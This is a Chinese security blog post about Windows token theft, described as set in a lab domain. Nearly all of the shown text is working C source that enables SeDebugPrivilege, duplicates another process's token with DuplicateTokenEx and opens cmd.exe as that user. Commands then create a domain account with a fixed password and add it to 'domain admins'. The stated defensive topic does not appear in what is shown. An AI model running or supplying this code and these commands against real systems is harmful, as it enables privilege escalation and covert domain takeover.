这篇文章将会对Windows 令牌窃取及防御技术进行介绍,所使用的环境是上一篇文章中搭建的环境:搭建一个简单的Windows域环境
#include <windows.h>
#include <stdio.h>
int main(int argc, char* argv[]) {
TOKEN_PRIVILEGES tokenPriv;
BOOL bResult = FALSE;
HANDLE hToken1 = NULL;
DWORD dwSize;
ZeroMemory(&tokenPriv, sizeof(tokenPriv));
tokenPriv.PrivilegeCount = 1;
// 启用 SeDebugPrivilege 权限
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken1) &&
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tokenPriv.Privileges[0].Luid))
{
tokenPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bResult = AdjustTokenPrivileges(hToken1, FALSE, &tokenPriv, 0, NULL, NULL);
if (!bResult) {
printf("AdjustTokenPrivileges Failed with Error Code: %d\n", GetLastError());
return 1;
}
}
else
{
printf("Open Process Token Failed with Error Code: %d\n", GetLastError());
return 1;
}
CloseHandle(hToken1);
// 打开目标进程句柄
HANDLE hProcess = NULL;
int pid = atoi(argv[1]);
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, pid);
if (!hProcess)
{
printf("Cannot Open Process. Failed with Error Code: %d\n", GetLastError());
CloseHandle(hProcess);
return 1;
}
// 打开目标进程令牌
HANDLE hToken = NULL;
if (!OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_DUPLICATE, &hToken))
{
printf("Cannot Open Process Token. Failed with Error Code: %d\n", GetLastError());
CloseHandle(hToken);
CloseHandle(hProcess);
return 1;
}
// 复制令牌
HANDLE NewToken = NULL;
BOOL DuplicateTokenResult = FALSE;
SECURITY_IMPERSONATION_LEVEL Sec_Imp_Level = SecurityImpersonation;
TOKEN_TYPE token_type = TokenPrimary;
DuplicateTokenResult = DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, Sec_Imp_Level, token_type, &NewToken);
if (!DuplicateTokenResult)
{
printf("Duplicate Token Failed with Error Code: %d\n", GetLastError());
CloseHandle(hToken);
CloseHandle(NewToken);
return 1;
}
// 使用复制的令牌创建新进程
STARTUPINFO startup_info = {};
PROCESS_INFORMATION process_info = {};
BOOL CreateProcTokenRes = FALSE;
CreateProcTokenRes = CreateProcessWithTokenW(NewToken, 0, L"C:\\Windows\\system32\\cmd.exe", NULL, CREATE_NEW_CONSOLE, NULL, NULL, &startup_info, &process_info);
if (!CreateProcTokenRes)
{
printf("Cannot Create Process With Token. Failed with Error Code: %d\n", GetLastError());
CloseHandle(NewToken);
return 1;
}
return 0;
}
cd C:UsersadminDesktop GetToken.exe 336
// 添加 test 用户,密码是 admin@123 net user test admin@123 /add /domain // 把 test 用户添加进域管理员组 net group "domain admins" test /add /domain // 查看域管理员 net group "domain admins"
本文作者:timeshatter
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/131423.html